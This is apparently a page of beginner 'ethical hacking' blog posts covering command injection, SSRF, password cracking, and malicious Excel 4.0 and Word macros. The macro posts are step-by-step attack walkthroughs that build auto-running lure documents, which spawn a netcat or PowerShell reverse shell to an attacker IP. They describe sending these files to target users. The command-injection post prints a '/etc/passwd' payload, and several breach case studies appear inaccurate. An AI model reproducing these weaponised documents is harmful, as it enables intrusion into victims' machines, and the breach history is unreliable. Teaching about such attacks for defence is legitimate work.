Category: Hacking

Posted on by

Command Injection for Beginners

Hello aspiring Ethical hackers. In this blogpost, you will learn about another hacking attack Command Injection. This vulnerability can be found in a wide range of web applications, from small personal websites to large corporate applications.

What is Command Injection?

Command Injection is a security vulnerability that allows an attacker to execute arbitrary commands on a target system. It occurs when an attacker can inject malicious code into a vulnerable application, which the application then executes with the privileges of the application itself.

How Command Injection Attacks Work?

Command Injection attacks work by exploiting vulnerabilities in an application that accepts user input and then passes that input directly to a shell or command interpreter. This allows attackers to inject arbitrary commands into the input that are executed with the same privileges as the application.

Attackers can use various techniques to exploit this vulnerability, such as appending commands to existing commands or using shell metacharacters to execute multiple commands in sequence. The impact of a successful attack can be significant, ranging from unauthorized access to sensitive data to full system compromise.

Command Injection

Command Injection is a serious threat to web applications because it can allow attackers to bypass application-level security measures and gain unauthorized access to sensitive data or systems. Moreover, these attacks can be difficult to detect and can lead to serious consequences, such as data breaches, system compromise, and financial loss.

Common vulnerable points for Command Injection

Common entry points for Injection attacks include web application forms, user input fields, and API endpoints. Any input that is passed to a shell or command interpreter without proper validation and sanitization can be vulnerable to Command Injection attacks.

For example, vulnerabilities can be introduced in code through improper input validation and sanitization, as well as through the use of system commands that are not properly escaped or sanitized. Examples of vulnerable code include:

perl
$command = $_GET[‘command’];
system(‘ls ‘ . $command);

In the above code, an attacker could inject arbitrary commands into the $command variable, which would then be executed by the system function. Examples of command Injection payloads and techniques include using shell metacharacters to execute multiple commands, appending commands to existing commands, and using the $(…) syntax to execute subcommands. An example of payload using shell metacharacters might look like this:

bash
; cat /etc/passwd

This would execute the cat command to display the contents of the /etc/passwd file.

Real World Examples

Command injection attacks are a serious threat to web applications and have been responsible for numerous security breaches in the past. In this section, we will discuss some real-world examples of this attacks.

1. Shellshock Bash vulnerability:

In 2014, a critical vulnerability was discovered in the Bash shell, which is used on many Unix-based systems. The vulnerability allowed an attacker to execute arbitrary commands by exploiting the way that Bash processed environment variables. This vulnerability affected millions of servers and devices worldwide, including many web servers.

2. EquiFax Data Breach:

In 2017, Equifax suffered a massive data breach that exposed the personal information of over 140 million people. The breach was the result of a command injection attack that targeted a vulnerability in the company’s web application framework. The attackers were able to execute arbitrary commands on the server and steal sensitive data.

These are just a few examples of the devastating consequences of command injection attacks. In each case, the attackers were able to gain unauthorized access to sensitive data by exploiting vulnerabilities in web applications.

Detection and Prevention

To identify Command Injection vulnerabilities, developers should thoroughly review their code for any input that is passed to a shell or command interpreter without proper validation and sanitization. There are several strategies that organizations can use to detect command injection vulnerabilities, including:

1. Manual Code Reviews

Developers should review code for any instances where user input is passed to a command shell or operating system.

2. Automated Testing:

Organizations can use tools like Burp Suite, OWASP ZAP, and Nikto to scan for command injection vulnerabilities automatically.

3. Web Application Firewalls:

WAFs can be configured to detect and block command injection attacks before they reach the server.

There are several techniques that can be used to mitigate Command Injection attacks. Some of these techniques are:

  1. Input Validation: One of the most effective techniques to mitigate Command Injection attacks is to validate all user input. This includes validating the length, format, and type of input. Input validation can be done on the client-side, server-side, or both. It is essential to ensure that the input is sanitized to remove any characters that could be used for injection attacks.
  2. Restricted Shell Access: To prevent attackers from executing arbitrary commands on the server, it is recommended to restrict shell access. This can be achieved by using a chroot jail, a containerization technology like Docker, or by limiting the commands that can be executed by the user.
  3. Principle of Least Privilege: The principle of least privilege is a security best practice that recommends limiting the access and permissions of users to only what is required to perform their tasks. This means that the user should not have unnecessary access to the server or application.
  4. Update and Patch Software: It is essential to keep all software updated and patched to prevent known vulnerabilities that can be exploited by attackers. This includes the operating system, web server, database server, and any other software used in the application.
  5. Use Security Libraries and Frameworks: Using security libraries and frameworks can help in mitigating Command Injection attacks. These libraries and frameworks are designed to handle input validation, encryption, and other security-related tasks.
  6. Monitor and Log Activity: Monitoring and logging activity can help in detecting Command Injection attacks. By monitoring the application and server logs, it is possible to identify suspicious activity and take appropriate action.

That’s all about Command Injection. We will be back with a new vulnerability vey soon. Until then, Good Bye.

Posted on by

Server Side Request Forgery For Beginners

Hello aspiring Ethical Hackers. In this blogpost, you will learn about Server Side Request Forgery. Server Side Request Forgery (SSRF) is a web application vulnerability that can allow attackers to send unauthorized requests from a server. This can lead to a wide range of security issues, such as unauthorized access to sensitive information, system compromise, and data exfiltration and it is one of the most common web application vulnerabilities.

In this article, we’ll discuss what SSRF is, how it works, types of SSRF attacks, examples of SSRF attacks, how to prevent and detect SSRF attacks, and case studies of notable SSRF attacks.

What is Server Side Request Forgery?

Server Side Request Forgery (SSRF) is a web application vulnerability that occurs when an attacker can manipulate a web application into sending unauthorized requests to other servers. In an SSRF attack, an attacker can exploit a web application to send requests to other internal or external servers, bypassing access controls and security mechanisms.

Server Side Request Forgery

SSRF attacks differ from other web application vulnerabilities, such as Cross-Site Scripting (XSS) or SQL Injection (SQLi), in that they do not rely on injecting malicious code into a web page. Instead, SSRF attacks exploit the application’s ability to send requests to other servers.

How SSRF Attacks Work?

  1. The attacker sends a request to the vulnerable web application, often by manipulating a user-controlled input field such as a URL parameter.
  2. The web application processes the request and sends a request to another server, typically based on the user’s input.
  3. The attacker intercepts the request and modifies it to send a request to a different server, often an internal server that is not accessible from outside the network.
  4. The vulnerable web application sends the unauthorized request to the attacker’s desired server, bypassing access controls and security mechanisms.
SSRF 2
SSRf 3

Common use cases for SSRF attacks include accessing sensitive information on internal servers, bypassing authentication mechanisms, and sending requests to cloud infrastructure providers to obtain credentials or perform other malicious actions.

Types of SSRF attacks

SSRF attacks can be classified into three main categories:

  1. Basic SSRF attacks,
  2. Advanced SSRF attacks, and
  3. Blind SSRF attacks.

Basic SSRF Attacks:

Basic SSRF attacks are the simplest form of SSRF attacks and involve manipulating user-controlled input to send unauthorized requests to other servers. These attacks can be prevented by validating and sanitizing input, limiting the scope of the request, and restricting the types of URLs that can be accessed.

Advanced SSRF Attack:

Advanced SSRF attacks are more complex and involve chaining together multiple vulnerabilities to achieve the desired result. These attacks can involve exploiting logic flaws, race conditions, or other vulnerabilities to bypass security mechanisms and gain access to sensitive information.

Blind SSRF Attack:

Blind SSRF attacks are a type of SSRF attack where the attacker does not receive a direct response from the target server. Instead, the attacker can use timing or error messages to determine whether the request was successful. Blind SSRF attacks can be more difficult to detect and prevent as the attacker is not receiving a direct response.

Real World Examples of SSRF Exploitation

SSRF attacks can have a wide range of consequences, from accessing sensitive information to system compromise and data exfiltration. Here are some examples of real-world SSRF attacks.

1. Yahoo Data Breach:

In 2016, Yahoo suffered a massive data breach that exposed the personal information of over 500 million users. The attack was carried out using an SSRF vulnerability that allowed the attacker to access Yahoo’s internal systems and steal the user data. The attacker used a common vulnerability in Yahoo’s image processing system that allowed users to submit URLs to be resized or cropped. By submitting a specially crafted URL that included instructions to access Yahoo’s internal systems, the attacker was able to gain access to sensitive information and cause widespread damage.

2. CapitalOne Data Breach:

In 2019, when Capital One suffered a massive data breach that exposed the personal information of over 100 million customers. The attack was carried out by exploiting an SSRF vulnerability in Capital One’s web application firewall, which allowed the attacker to access the company’s AWS server and steal sensitive information. The attacker was able to use the SSRF vulnerability to obtain AWS credentials and gain access to the server, which contained sensitive information such as names, addresses, credit scores, and Social Security numbers.

3. Shopify:

In 2018, a security researcher discovered an SSRF vulnerability in Shopify that allowed an attacker to obtain the API keys for the company’s payment gateway. By exploiting the vulnerability, the attacker was able to obtain sensitive information and perform unauthorized transactions.

4. Tesla Cloud Credential Theft:

In 2018, a researcher discovered an SSRF vulnerability in Tesla’s cloud infrastructure that allowed them to obtain access tokens for the company’s AWS account. The attacker was able to use the access tokens to launch instances in the company’s AWS account and perform other malicious actions.

5. Jenkins CI Server Compromise:

In 2017, a vulnerability in the Jenkins CI server allowed an attacker to compromise the server and gain access to sensitive information. The vulnerability was caused by an SSRF vulnerability that allowed the attacker to access internal servers.

Prevention and Detection

Preventing and detecting SSRF attacks requires a combination of secure coding practices, network security measures, and security testing. Here are some best practices for preventing and detecting SSRF attacks:

1. Secure Coding Practices

Using secure coding practices can help prevent SSRF vulnerabilities from being introduced into the application. Developers should validate and sanitize user input, limit the scope of requests, and restrict access to sensitive information and systems.

2. Restricting External Requests:

Restricting external requests can help prevent unauthorized requests from leaving the network. Applications should only be able to send requests to approved external servers, and any user input should be validated and sanitized before being used in a request.

3. Network Security Measures:

To prevent SSRF attacks, it’s essential to implement network security measures that restrict unauthorized requests from leaving the network. Best practices include using a Firewall and implementing access controls.

A firewall can help restrict incoming and outgoing traffic, preventing unauthorized requests from leaving the network. Firewalls can be configured to block requests to specific IP addresses or ranges, limiting the scope of potential SSRF attacks. Implementing access controls can help prevent unauthorized users from accessing sensitive information or systems. Access controls can be used to restrict access to internal servers and APIs, limiting the scope of potential SSRF attacks.

Posted on by

Password cracking for beginners

Hello aspiring Ethical hackers. In this article, you will learn what is password cracking and various types of password cracking. In Ethical hacking, password cracking is recovering passwords from data that has been stored in or transmitted by a computer system. Hackers use password cracking to grab credentials which can be helpful in further exploiting of the system. There are various password cracking techniques. They are,

1. Shoulder Surfing
2. Password Guessing
3. Dictionary Attack
4. Brute Force Attack
5. Rainbow Table Attack
6. Phishing
7. Sniffing
8. Malware

Password Cracking 1

Let’s learn in detail of each attack.

1. Shoulder Surfing

Shoulder Surfing is one of the easiest password cracking techniques that doesn’t require use of any technology. In shoulder surfing, the hacker stands behind (or sits behind, position is not really important) the victim when he is entering his credentials and captures the credentials by simple observation. As you can see, this is the easiest way to capture credentials of the target.

2. Password Guessing

Another password cracking technique that doesn’t require any technology. In this technique, hacker tries to guess the password of the victim using his own mind. You may be surprised but this technique yielded me results at least 20% of the total attempts made.

3. Dictionary Attack

In a dictionary attack, a hacker uses a dictionary to crack passwords. A dictionary or wordlist has a huge list of words (possible passwords), each one of which is tried as a password. In Kali Linux, the dictionary or wordlists are present in /usr/share/dirb/wordlists directory.

4. Brute Force Attack

In a brute force attack, hackers use every possible criteria or password to crack the credentials. A brute force attack may be slow but it will eventually crack the password. A brute force attack works by calculating the hash function of every password string it has and compares it with one on the target system or victim.

5. Rainbow Table Attack

To understand Rainbow Table Attack, you need to first understand what is a Rainbow Table. A Rainbow Table is a database that contains huge list of plaintext passwords and their precompiled hashes. Unlike a Brute Force attack, Rainbow table attack bypasses calculation of a hash for every password string as it already has a pre compiled list of hashes.

6. Phishing

Phishing is one of the easiest methods to crack passwords. You have already learnt about phishing in our previous blogposts.

7. Sniffing

Sniffing or Man In The Middle (MITM) attack can also be used to crack passwords while they are on transit in a network. Learn more about sniffing here.

8. Malware

Malware is another way hackers capture credentials of their victims. Once hackers gain initial access to a system, they install malware which allows hackers to not only perform further malicious actions but also capture user credentials from the target system.

Posted on by

Excel Macros for beginners

Hello aspiring ethical hackers. In our previous article, you have learnt what a Macro is and how to create a malicious VBA macro. In this article, you will learn about Excel 4.0 Macros and how to create one. Excel 4.0 Macros or XLM were introduced by Microsoft in 1992 when Excel 4.0 was launched as a default macro language and they serve the same functions as VBA macros in Word.

As Excel 4.0 Macros are used for legitimate purposes, they can’t just be disabled by many. Further increasing the effectiveness of these macros, there is not yet a good detection method to detect malicious XL4 macros. Apart from this, they are very simple create but also very powerful just like Visual Basic Application (VBA) Macros.

Now let’s see how to create an Excel 4.0 Macro. On a Windows system, we open Excel in Microsoft Office or the Office Suite. We are doing this on Microsoft Office 2007. You should see an Excel Workbook opened as shown below.

Excel Macro 1

Right click on “Sheet 1” and select the “Insert” option as shown below.

Excel Macro 2

In the newly opened window, select MS Excel 4.0 Macro and click on “OK”.

excel 4.0 macros

This will change the name of “Sheet 1” to “Macro 1” as shown below.

Excel Macro 4

Save the file with the name you like. We have named it “evil_macro” for easy identification. While saving it, save it as a Macro Enabled Excel Workbook.

Excel Macro 5

Once the file is saved, it’s time to create the macro. In the first column, which is named A1, we insert the command given below.

=EXEC(“cmd.exe”)

You may not realize, but you have already created your first XL4 macro. In the second column, i.e A2, insert another command =HALT(). This is to ensure that the macro you created does not face an error while running. It’s time to test your macro. Right Click on the first column, and click on “Run” as shown below.

Excel Macro 6

Most probably, this will open a new window as shown below. Click on “Run”.

Excel Macro 7

Doing this opens a Windows CMD window as shown below.

Excel Macro 10

Voila, we successfully created a Excel 4.0 Macro and even executed it. If you have noticed it, we opened a Windows CMD by inserting a simple code. Now, let’s make a few changes to the “evil_macro” file. Move the =HALT() command to A3 cell and enter command given below in cell A2. Save the file.

=ALERT(“You have been hacked”)

Excel Macro 11

Right click on Cell A1 and select “Run” again just like you did before.

Excel Macro 14

Now, we can see that apart from Windows CMD window being opened, another window popped up with the message “You have been hacked”. We have just performed two operations with macros in one file. Not just cmd.exe, we can open other programs like Notepad and Calc.exe using the “=exec” function.

Excel Macro 15
Excel Macro 16

Now, let’s try something a bit advanced like spawning a reverse shell now. Download the Netcat Windows executable. Open Notepad and insert the following command into it.

-e cmd.exe.

On our system, this command looks like this.

C:\Users\nspadm\Desktop\nc.exe 192.168.36.189 4444 -e cmd.exe

The -e option specifies which command to execute after netcat makes a successful connection. Now, save this file as a CMD file. This can be done by saving the file in double quotes. For example, “shell.cmd” and keeping the file type as all files.

Excel Macro 17

Now, in your evil_macro file, change the =EXEC function to execute the shell.cmd file you just now created as shown below.

Excel Macro 18a

Save the file. Before executing the macro, start a Netcat listener on the listener IP address you specified.

Excel Macro 19

Now, when you execute the macro, you should get a successful shell as shown below.

Excel Macro 20

This is all fine but nobody will open an Excel file and execute some suspicious looking code in it. We need the code to run automatically as soon as the user opens the Excel file. To do this, Click on A1 cell of your “evil_macro” file and rename it to “Auto_Open” as shown below.

Excel Macro 22

Save the changes and close the file. Start the netcat listener again. Now, just open the evil_macro file and you should see the successful spawning of reverse shell again. That’s all about Excel 4.0 Macros for now.

Posted on by

Malicious Macro’s : What, Why and How

Hello aspiring Ethical Hackers. In this article, you will learn about Malicious Macros also known as Macro Malware or Macro Virus. In computer science, a Macro is a set of commands grouped together as a single command. This is used to run some tasks automatically. In Word, Macros are used to automate frequently used tasks.
Hackers have been using Macros since a long time as a means to gain initial access to target networks by injecting malicious code into macros. These macros all called malicious macros or macro malware or macro virus. Let’s see how to create a malicious macro.
For this we will be using a tool that is here. In Kali, clone this tool as shown below.

Macro Virus 1

Navigate into the cloned directory.

Macro Virus 2

Inside that directory, there will be two python scripts: “newpayloadgeneration.py” and ‘payload.py’. Run the script ‘newpayloadgeneration.py’ giving the Attacker IP and port as options. This script generates a Powershell script for reverse shell. Obviously, the IP and port should be of that system on which the listener is running to receive the reverse shell.

Macro Virus 3
Macro Virus 4
Macro Virus 5

Copy the generated encoded string. Open the file ‘payload.py’ and paste the encoded string in the highlighted place.

Macro Virus 6
Macro Virus 8
Macro Virus 7

Once pasted, save the file ‘payload.py’ to preserve the changes. Now, execute the ‘payload.py’ script.

Macro Virus 9
Macro Virus 10

The code for malicious macro is ready. Now let’s create a Macro document. For this tutorial, we are using MS Office 2007 to create it. Open a new Word document, go to View tab and click on Macros (as highlighted below).

malicious macro

Click on “view macros”.

Macro Virus 12

In the new window that opens, click on “create” and give any name you prefer to that macro (We named it test, obviously).

Macro Virus 13

Now, we create the code for macro. It starts with “Sub AutoOpen(). “Sub” stands for Subroutine in macro. It is a small program within the Visual Basic editor. Setting AutoOpen() executes the macro automatically whenever the document is opened. In the subroutine test(), we paste the malicious code we created earlier as shown below.

Macro Virus 14

Then we save this file. This file is sent to the target users. In Real World hacking attacks, since this is the lure document, some bells and whistles are added to convince users to open the document and enable macros. We start the Netcat listener on the attacker machine. When the target user opens this file, we get a security warning saying that macros have been disabled. This is a security feature by Microsoft to protect user from malicious macros. Let’s enable macros for this tutorial. click on options and enable macros as shown below.

Macro Virus 15a
Macro Virus 15b

As soon as we do this, a Powershell window opens (remember that a we created a Powershell reverse shell)

Macro Virus 15c

and we get a incoming reverse shell on our listener as shown below.

Macro Virus 16

This is how malicious macros work to give attackers initial access.